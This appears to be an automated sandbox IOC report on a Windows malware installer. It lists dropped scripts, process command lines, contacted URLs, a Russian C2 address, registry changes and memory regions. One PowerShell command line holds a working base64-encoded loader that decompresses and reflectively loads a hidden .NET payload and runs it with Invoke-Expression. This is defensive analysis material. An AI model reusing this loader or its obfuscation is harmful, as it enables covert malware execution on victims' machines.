IOC Report
f6FauZ2CEz.exe

loading gif

Files

File Path
Type
Category
Malicious
f6FauZ2CEz.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\QJHJap.ps1
Unicode text, UTF-8 (with BOM) text, with very long lines (488), with CRLF line terminators
dropped
malicious
C:\Users\user\start.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\temp.bat
DOS batch file, ASCII text, with very long lines (41860), with CRLF, LF line terminators
dropped
malicious
C:\Users\Public\Desktop\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:27 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\Tmp20B6.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\Tmp20D7.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewyjoak1.k2v.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gujfxim1.5mu.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcqrl52j.rkv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xul4wa40.4zw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06
data
dropped
C:\Users\user\QJHJap.bat
DOS batch file, ASCII text, with very long lines (41860), with CRLF, LF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\f6FauZ2CEz.exe
"C:\Users\user\Desktop\f6FauZ2CEz.exe"
malicious
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\user\start.vbs"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\temp.bat" "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KIyAiVGhlIHN1cmVzdCB3YXkgdG8gY29ycnVwdCBhIHlvdXRoIGlzIHRvIGluc3RydWN0IGhpbSB0byBob2xkIGluIGhpZ2hlciBlc3RlZW0gdGhvc2Ugd2hvIHRoaW5rIGFsaWtlIHRoYW4gdGhvc2Ugd2hvIHRoaW5rIGRpZmZlcmVudGx5LiINCiMgIkluIGhlYXZlbiwgYWxsIHRoZSBpbnRlcmVzdGluZyBwZW9wbGUgYXJlIG1pc3NpbmcuIg0KIyAiSGUgd2hvIGhhcyBhIHdoeSB0byBsaXZlIGNhbiBiZWFyIGFsbW9zdCBhbnkgaG93LiINCiMgIlRvIGxpdmUgaXMgdG8gc3VmZmVyLCB0byBzdXJ2aXZlIGlzIHRvIGZpbmQgc29tZSBtZWFuaW5nIGluIHRoZSBzdWZmZXJpbmcuIg0KIyAiV2l0aG91dCBtdXNpYywgbGlmZSB3b3VsZCBiZSBhIG1pc3Rha2UuIg0KDQoNCmZ1bmN0aW9uIFJldmVyc2VTdHJpbmcoJGlucHV0U3RyaW5nKSB7DQogICAgJGNoYXJBcnJheSA9ICRpbnB1dFN0cmluZy5Ub0NoYXJBcnJheSgpDQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0NCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheQ0KICAgIHJldHVybiAkcmV2ZXJzZWRTdHJpbmcNCn0NCiMgIlRoZXJlIGlzIGFsd2F5cyBzb21lIG1hZG5lc3MgaW4gbG92ZS4gQnV0IHRoZXJlIGlzIGFsc28gYWx3YXlzIHNvbWUgcmVhc29uIGluIG1hZG5lc3MuIg0KIyAiVGhhdCB3aGljaCBkb2VzIG5vdCBraWxsIHVzIG1ha2VzIHVzIHN0cm9uZ2VyLiINCg0KZnVuY3Rpb24gQ2xvc2UtUHJvY2VzcyB7DQogICAgcGFyYW0oDQogICAgICAgIFtzdHJpbmddJFByb2Nlc3NOYW1lDQogICAgKQ0KDQogICAgJHByb2Nlc3MgPSBHZXQtUHJvY2VzcyAtTmFtZSAkUHJvY2Vzc05hbWUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUNCg0KICAgIGlmICgkcHJvY2VzcyAtbmUgJG51bGwpIHsNCiAgICAgICAgU3RvcC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRm9yY2UNCgl9DQp9DQojICJJbiBpbmRpdmlkdWFscywgaW5zYW5pdHkgaXMgcmFyZTsgYnV0IGluIGdyb3VwcywgcGFydGllcywgbmF0aW9ucywgYW5kIGVwb2NocywgaXQgaXMgdGhlIHJ1bGUuIg0KIyAiVGhlIG1hbiBvZiBrbm93bGVkZ2UgbXVzdCBiZSBhYmxlIG5vdCBvbmx5IHRvIGxvdmUgaGlzIGVuZW1pZXMgYnV0IGFsc28gdG8gaGF0ZSBoaXMgZnJpZW5kcy4iDQojICJBIHRoaW5rZXIgc2VlcyBoaXMgb3duIGFjdGlvbnMgYXMgZXhwZXJpbWVudHMgYW5kIHF1ZXN0aW9ucyDigJQgYXMgYXR0ZW1wdHMgdG8gZmluZCBvdXQgc29tZXRoaW5nLiBTdWNjZXNzIGFuZCBmYWlsdXJlIGFyZSBmb3IgaGltIGFuc3dlcnMgYWJvdmUgYWxsLiINCg0KZnVuY3Rpb24gQ05WKCRhcnIpeyANCiAgICAkbz0xMjM7IA0KICAgICRkPSRudWxsOyANCiAgICBmb3JlYWNoKCRpIGluICRhcnIpeyANCiAgICAgICAgaWYgKCRpIC1ndCAxMjcpIHsgDQogICAgICAgICAgICAkZCs9IFtjaGFyXSgkaS0kbykgDQogICAgICAgIH0gZWxzZSB7IA0KICAgICAgICAgICAgJGQrPSBbY2hhcl0oJGkrJG8pIA0KICAgICAgICB9IA0KICAgIH0gDQogICAgcmV0dXJuICRkIA0KfQ0KDQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENOViAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlFKSEphcC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\user\QJHJap.ps1' -Encoding UTF8"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\QJHJap.ps1"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
5.42.92.179:18418
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct
unknown
https://duckduckgo.com/chrome_newtab
unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
unknown
https://duckduckgo.com/ac/?q=
unknown
http://tempuri.org/Entity/Id14ResponseD
unknown
http://tempuri.org/Entity/Id23ResponseD
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
unknown
http://tempuri.org/Entity/Id12Response
unknown
http://tempuri.org/
unknown
http://tempuri.org/Entity/Id2Response
unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
unknown
http://tempuri.org/Entity/Id21Response
unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
unknown
http://tempuri.org/Entity/Id9
unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
unknown
http://tempuri.org/Entity/Id8
unknown
http://tempuri.org/Entity/Id6ResponseD
unknown
http://tempuri.org/Entity/Id5
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
unknown
http://tempuri.org/Entity/Id4
unknown
http://tempuri.org/Entity/Id7
unknown
http://tempuri.org/Entity/Id6
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
unknown
http://tempuri.org/Entity/Id19Response
unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
unknown
https://aka.ms/pscore6lB
unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
unknown
http://tempuri.org/Entity/Id13ResponseD
unknown
https://nuget.org/nuget.exe
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat
unknown
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
unknown
http://tempuri.org/Entity/Id15Response
unknown
http://tempuri.org/Entity/Id5ResponseD
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
unknown
http://tempuri.org/Entity/Id6Response
unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
unknown
https://api.ip.sb/ip
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://schemas.xmlsoap.org/ws/2004/04/sc
unknown
http://tempuri.org/Entity/Id1ResponseD
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
unknown
http://tempuri.org/Entity/Id9Response
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://tempuri.org/Entity/Id20
unknown
http://tempuri.org/Entity/Id21
unknown
http://tempuri.org/Entity/Id22
unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
unknown
http://tempuri.org/Entity/Id23
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
unknown
http://tempuri.org/Entity/Id24
unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
unknown
http://tempuri.org/Entity/Id24Response
unknown
https://www.ecosia.org/newtab/
unknown
http://tempuri.org/Entity/Id1Response
unknown
https://github.com/Pester/Pester
unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
unknown
http://tempuri.org/Entity/Id21ResponseD
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
unknown
http://schemas.xmlsoap.org/ws/2004/04/trust
unknown
http://tempuri.org/Entity/Id10
unknown
http://tempuri.org/Entity/Id11
unknown
http://tempuri.org/Entity/Id10ResponseD
unknown
http://tempuri.org/Entity/Id12
unknown
http://tempuri.org/Entity/Id16Response
unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
unknown
http://tempuri.org/Entity/Id13
unknown
http://tempuri.org/Entity/Id14
unknown
http://tempuri.org/Entity/Id15
unknown
http://tempuri.org/Entity/Id16
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
unknown
http://tempuri.org/Entity/Id17
unknown
http://tempuri.org/Entity/Id18
unknown
http://tempuri.org/Entity/Id5Response
unknown
http://tempuri.org/Entity/Id19
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
unknown
http://tempuri.org/Entity/Id15ResponseD
unknown
http://tempuri.org/Entity/Id10Response
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
unknown
http://tempuri.org/Entity/Id11ResponseD
unknown
There are 90 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
5.42.92.179
unknown
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064
Blob
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash

Memdumps

Base Address
Regiontype
Protect
Malicious
402000
remote allocation
page execute and read and write
malicious
6DDA000
trusted library allocation
page read and write
malicious
650F000
trusted library allocation
page read and write
malicious
2FD7000
trusted library allocation
page read and write
malicious
323E000
stack
page read and write
6D8E000
trusted library allocation
page read and write
4382000
trusted library allocation
page read and write
5480000
trusted library allocation
page read and write
9699000
trusted library allocation
page read and write
4FD9000
trusted library allocation
page read and write
7000000
heap
page execute and read and write
6A50000
trusted library allocation
page execute and read and write
7673000
heap
page read and write
4172000
trusted library allocation
page read and write
52E0000
trusted library allocation
page read and write
355F000
heap
page read and write
5950000
heap
page read and write
5430000
trusted library allocation
page read and write
95F1000
trusted library allocation
page read and write
85E000
stack
page read and write
88F8000
trusted library allocation
page read and write
31FD000
heap
page read and write
262F000
stack
page read and write
89E5000
trusted library allocation
page read and write
401000
unkown
page execute read
3134000
trusted library allocation
page read and write
328E000
trusted library allocation
page read and write
12AC000
heap
page read and write
964C000
trusted library allocation
page read and write
7A95000
trusted library allocation
page read and write
429F000
trusted library allocation
page read and write
8817000
stack
page read and write
4F38000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
53C2000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page execute and read and write
546B000
stack
page read and write
962B000
trusted library allocation
page read and write
4D60000
heap
page read and write
2EFB000
heap
page read and write
31F3000
heap
page read and write
4130000
trusted library allocation
page read and write
4884000
heap
page read and write
30C9000
trusted library allocation
page read and write
3F65000
trusted library allocation
page read and write
96BD000
trusted library allocation
page read and write
417D000
trusted library allocation
page read and write
69A0000
trusted library allocation
page read and write
33F7000
trusted library allocation
page read and write
3280000
trusted library allocation
page read and write
7B9A000
heap
page read and write
6C20000
trusted library allocation
page read and write
8900000
heap
page read and write
9644000
trusted library allocation
page read and write
7AA8000
trusted library allocation
page read and write
760C000
heap
page read and write
10D0000
heap
page read and write
3500000
heap
page read and write
5410000
heap
page read and write
43D1000
trusted library allocation
page read and write
32EB000
trusted library allocation
page read and write
7C40000
heap
page execute and read and write
5CCC000
stack
page read and write
6EBE000
stack
page read and write
75D8000
heap
page read and write
6960000
trusted library allocation
page read and write
43F9000
trusted library allocation
page read and write
3208000
heap
page read and write
2E7B000
heap
page read and write
75FF000
heap
page read and write
723E000
stack
page read and write
320C000
heap
page read and write
69E0000
trusted library allocation
page read and write
3335000
trusted library allocation
page read and write
1080000
heap
page read and write
3207000
heap
page read and write
3265000
heap
page read and write
74E0000
heap
page read and write
59EE000
stack
page read and write
9697000
trusted library allocation
page read and write
77E0000
trusted library allocation
page read and write
F37000
stack
page read and write
5A4E000
trusted library allocation
page read and write
3263000
heap
page read and write
6C12000
trusted library allocation
page read and write
31E6000
heap
page read and write
11EE000
stack
page read and write
8B59000
trusted library allocation
page read and write
9631000
trusted library allocation
page read and write
5832000
heap
page read and write
5461000
trusted library allocation
page read and write
2EFB000
stack
page read and write
31E3000
heap
page read and write
797B000
stack
page read and write
8860000
trusted library allocation
page read and write
67A0000
trusted library allocation
page read and write
7AF000
stack
page read and write
7E40000
trusted library allocation
page read and write
895E000
trusted library allocation
page read and write
531E000
stack
page read and write
40A000
unkown
page read and write
3371000
heap
page read and write
5E89000
trusted library allocation
page read and write
34D8000
trusted library allocation
page read and write
4853000
trusted library allocation
page execute and read and write
3239000
stack
page read and write
51DE000
stack
page read and write
5A8E000
stack
page read and write
3275000
trusted library allocation
page read and write
4404000
trusted library allocation
page read and write
54D0000
trusted library allocation
page read and write
8E8E000
stack
page read and write
7620000
heap
page read and write
41A5000
trusted library allocation
page read and write
586D000
heap
page read and write
75E0000
trusted library allocation
page read and write
3513000
trusted library allocation
page read and write
8ECE000
stack
page read and write
6790000
trusted library allocation
page read and write
7840000
trusted library allocation
page read and write
74F0000
heap
page read and write
41D1000
trusted library allocation
page read and write
753D000
heap
page read and write
4136000
trusted library allocation
page read and write
54A0000
trusted library allocation
page read and write
7D70000
trusted library allocation
page execute and read and write
1627000
trusted library allocation
page execute and read and write
422C000
trusted library allocation
page read and write
69F0000
trusted library allocation
page read and write
318A000
trusted library allocation
page read and write
4B0000
heap
page read and write
32DD000
trusted library allocation
page read and write
7576000
heap
page read and write
691A000
trusted library allocation
page read and write
52D8000
trusted library allocation
page read and write
5960000
heap
page read and write
2E30000
heap
page read and write
43D6000
trusted library allocation
page read and write
2F20000
heap
page read and write
3740000
trusted library allocation
page read and write
32A3000
trusted library allocation
page read and write
31F3000
trusted library allocation
page read and write
709D000
stack
page read and write
7CC0000
trusted library allocation
page read and write
5180000
trusted library allocation
page read and write
57E3000
heap
page execute and read and write
76A8000
heap
page read and write
43AA000
trusted library allocation
page read and write
7DB0000
trusted library allocation
page read and write
35B6000
heap
page read and write
5B8000
heap
page read and write
5B8F000
stack
page read and write
967C000
trusted library allocation
page read and write
40D8000
trusted library allocation
page read and write
4110000
trusted library allocation
page read and write
8240000
trusted library allocation
page read and write
428D000
trusted library allocation
page read and write
4CD5000
trusted library allocation
page execute and read and write
5A67000
trusted library allocation
page read and write
50C0000
heap
page readonly
21E0000
heap
page read and write
35AB000
heap
page read and write
3723000
trusted library allocation
page execute and read and write
31C8000
heap
page read and write
4869000
trusted library allocation
page read and write
321C000
heap
page read and write
88D0000
heap
page read and write
122D000
stack
page read and write
5170000
trusted library allocation
page execute and read and write
796E000
stack
page read and write
7532000
heap
page read and write
3816000
heap
page read and write
327F000
stack
page read and write
70DB000
stack
page read and write
7541000
heap
page read and write
78EE000
stack
page read and write
34AE000
stack
page read and write
549E000
trusted library allocation
page read and write
698E000
trusted library allocation
page read and write
7005000
heap
page execute and read and write
32A9000
trusted library allocation
page read and write
3262000
heap
page read and write
1600000
trusted library allocation
page read and write
7E8B000
stack
page read and write
3137000
trusted library allocation
page read and write
30E3000
trusted library allocation
page read and write
962F000
trusted library allocation
page read and write
3380000
trusted library allocation
page read and write
4286000
trusted library allocation
page read and write
31E1000
heap
page read and write
31E8000
heap
page read and write
6930000
trusted library allocation
page read and write
31A3000
trusted library allocation
page read and write
334E000
trusted library allocation
page read and write
438F000
trusted library allocation
page read and write
72BE000
stack
page read and write
2E10000
heap
page read and write
3770000
trusted library allocation
page read and write
446000
remote allocation
page execute and read and write
54B0000
trusted library allocation
page read and write
7671000
heap
page read and write
307A000
trusted library allocation
page read and write
88F0000
trusted library allocation
page read and write
7FAE000
stack
page read and write
16A0000
heap
page read and write
1610000
trusted library allocation
page read and write
16B0000
heap
page read and write
40CD000
trusted library allocation
page read and write
8B80000
trusted library section
page read and write
80EF000
stack
page read and write
9693000
trusted library allocation
page read and write
4261000
trusted library allocation
page read and write
3356000
trusted library allocation
page read and write
73BE000
stack
page read and write
6EEC000
stack
page read and write
727B000
stack
page read and write
57E0000
heap
page execute and read and write
31F0000
heap
page read and write
3226000
trusted library allocation
page read and write
33B3000
trusted library allocation
page read and write
512C000
stack
page read and write
6882000
trusted library allocation
page read and write
445000
unkown
page readonly
894E000
stack
page read and write
7B20000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
30F8000
trusted library allocation
page read and write
2DDF000
stack
page read and write
3195000
trusted library allocation
page read and write
33F4000
trusted library allocation
page read and write
3272000
trusted library allocation
page read and write
75B0000
heap
page execute and read and write
35A0000
heap
page read and write
50E2000
trusted library allocation
page read and write
5250000
heap
page execute and read and write
1622000
trusted library allocation
page read and write
3F52000
trusted library allocation
page read and write
2C7E000
stack
page read and write
353B000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
6F7F000
stack
page read and write
584E000
stack
page read and write
134C000
heap
page read and write
2ED7000
heap
page read and write
77AB000
stack
page read and write
4890000
heap
page read and write
162B000
trusted library allocation
page execute and read and write
15F0000
trusted library allocation
page read and write
2C30000
heap
page read and write
5BCC000
stack
page read and write
541F000
stack
page read and write
715E000
stack
page read and write
401000
unkown
page execute read
7DA0000
trusted library allocation
page read and write
9633000
trusted library allocation
page read and write
96C1000
trusted library allocation
page read and write
4342000
trusted library allocation
page read and write
4AE000
stack
page read and write
4E70000
heap
page read and write
8A90000
trusted library allocation
page read and write
3810000
heap
page read and write
763F000
heap
page read and write
5A13000
heap
page read and write
8820000
trusted library allocation
page execute and read and write
964A000
trusted library allocation
page read and write
3158000
trusted library allocation
page read and write
3057000
trusted library allocation
page read and write
965D000
trusted library allocation
page read and write
4316000
trusted library allocation
page read and write
71DA000
stack
page read and write
4DFC000
stack
page read and write
4E3E000
stack
page read and write
751C000
heap
page read and write
97B9000
trusted library allocation
page read and write
3340000
trusted library allocation
page read and write
529E000
stack
page read and write
31BC000
trusted library allocation
page read and write
7BDB000
trusted library allocation
page read and write
590000
heap
page read and write
7E30000
trusted library allocation
page read and write
2E67000
heap
page read and write
3546000
trusted library allocation
page read and write
42E4000
trusted library allocation
page read and write
210F000
stack
page read and write
75A0000
heap
page read and write
9678000
trusted library allocation
page read and write
7490000
heap
page read and write
761B000
heap
page read and write
8880000
trusted library allocation
page execute and read and write
2CA0000
heap
page read and write
75A0000
trusted library allocation
page read and write
69D0000
trusted library allocation
page read and write
79AE000
stack
page read and write
32F0000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
418A000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
5962000
trusted library allocation
page read and write
31F3000
heap
page read and write
75E6000
heap
page read and write
3124000
trusted library allocation
page read and write
4300000
trusted library allocation
page read and write
4141000
trusted library allocation
page read and write
9642000
trusted library allocation
page read and write
12BD000
heap
page read and write
6971000
trusted library allocation
page read and write
7ABA000
trusted library allocation
page read and write
436A000
trusted library allocation
page read and write
580E000
stack
page read and write
31EA000
heap
page read and write
5444000
trusted library allocation
page read and write
1616000
trusted library allocation
page execute and read and write
63CB000
trusted library allocation
page read and write
544B000
trusted library allocation
page read and write
31DC000
heap
page read and write
5490000
trusted library allocation
page read and write
4350000
trusted library allocation
page read and write
42F2000
trusted library allocation
page read and write
82BE000
stack
page read and write
4354000
trusted library allocation
page read and write
8AE0000
trusted library allocation
page read and write
9B000
stack
page read and write
42E7000
trusted library allocation
page read and write
43A4000
trusted library allocation
page read and write
556B000
stack
page read and write
29BD000
stack
page read and write
160D000
trusted library allocation
page execute and read and write
667E000
stack
page read and write
4151000
trusted library allocation
page read and write
3327000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
50E0000
trusted library section
page read and write
432000
remote allocation
page execute and read and write
7C9E000
stack
page read and write
3090000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page execute and read and write
6F70000
trusted library allocation
page read and write
312E000
trusted library allocation
page read and write
321C000
heap
page read and write
3739000
trusted library allocation
page read and write
31F2000
heap
page read and write
6C30000
trusted library allocation
page read and write
5E81000
trusted library allocation
page read and write
43A8000
trusted library allocation
page read and write
40E6000
trusted library allocation
page read and write
2EF3000
heap
page read and write
6A40000
trusted library allocation
page read and write
5472000
trusted library allocation
page read and write
431000
unkown
page read and write
524E000
stack
page read and write
41D8000
trusted library allocation
page read and write
408000
unkown
page readonly
670E000
trusted library allocation
page read and write
413D000
trusted library allocation
page read and write
5553000
heap
page read and write
441000
unkown
page read and write
6966000
trusted library allocation
page read and write
8220000
heap
page read and write
2110000
heap
page read and write
4880000
heap
page read and write
31AF000
trusted library allocation
page read and write
7830000
trusted library allocation
page read and write
968F000
trusted library allocation
page read and write
7AAA000
trusted library allocation
page read and write
7C30000
trusted library allocation
page read and write
4EE5000
trusted library allocation
page read and write
4356000
trusted library allocation
page read and write
4CD2000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
168E000
stack
page read and write
297C000
stack
page read and write
8910000
heap
page read and write
4279000
trusted library allocation
page read and write
711E000
stack
page read and write
594E000
stack
page read and write
411E000
trusted library allocation
page read and write
516E000
stack
page read and write
82C0000
heap
page read and write
6EFE000
stack
page read and write
3206000
heap
page read and write
7AC0000
trusted library allocation
page execute and read and write
400000
unkown
page readonly
7EE000
stack
page read and write
3F3F000
trusted library allocation
page read and write
6F30000
trusted library allocation
page read and write
4FC0000
heap
page read and write
4B5000
heap
page read and write
31F1000
heap
page read and write
35AE000
heap
page read and write
775D000
stack
page read and write
3F6F000
trusted library allocation
page read and write
58C7000
heap
page read and write
7A89000
trusted library allocation
page read and write
1090000
heap
page read and write
4105000
trusted library allocation
page read and write
78E0000
trusted library allocation
page read and write
332A000
trusted library allocation
page read and write
653E000
stack
page read and write
5A4B000
trusted library allocation
page read and write
4255000
trusted library allocation
page read and write
15EE000
stack
page read and write
31F4000
heap
page read and write
8320000
trusted library allocation
page execute and read and write
12B9000
heap
page read and write
6BC6000
trusted library allocation
page read and write
4840000
trusted library allocation
page read and write
4323000
trusted library allocation
page read and write
43EA000
trusted library allocation
page read and write
75CB000
heap
